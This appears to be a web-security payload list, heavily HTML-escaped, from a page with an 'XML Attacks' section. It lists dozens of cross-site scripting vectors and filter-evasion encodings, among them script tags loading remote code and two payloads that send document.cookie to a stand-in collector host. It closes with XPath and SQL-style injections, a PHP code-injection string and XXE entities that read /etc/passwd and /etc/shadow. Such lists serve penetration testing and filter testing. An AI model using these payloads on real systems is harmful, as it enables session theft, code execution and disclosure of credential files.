&amp;quot;&amp;amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;amp;lt;SCR'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;? echo('&amp;amp;lt;SCR)';echo('IPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;');&amp;amp;nbsp;?&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HEAD&amp;amp;gt;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;amp;gt; &amp;amp;lt;/HEAD&amp;amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=`&amp;amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT&amp;amp;gt;document.write(&amp;quot;&amp;quot;&amp;amp;lt;SCRI&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;about:&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/style&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style&amp;amp;gt;&amp;amp;lt;!--&amp;amp;lt;/style&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;![CDATA[&amp;amp;lt;!--]]&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/div&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
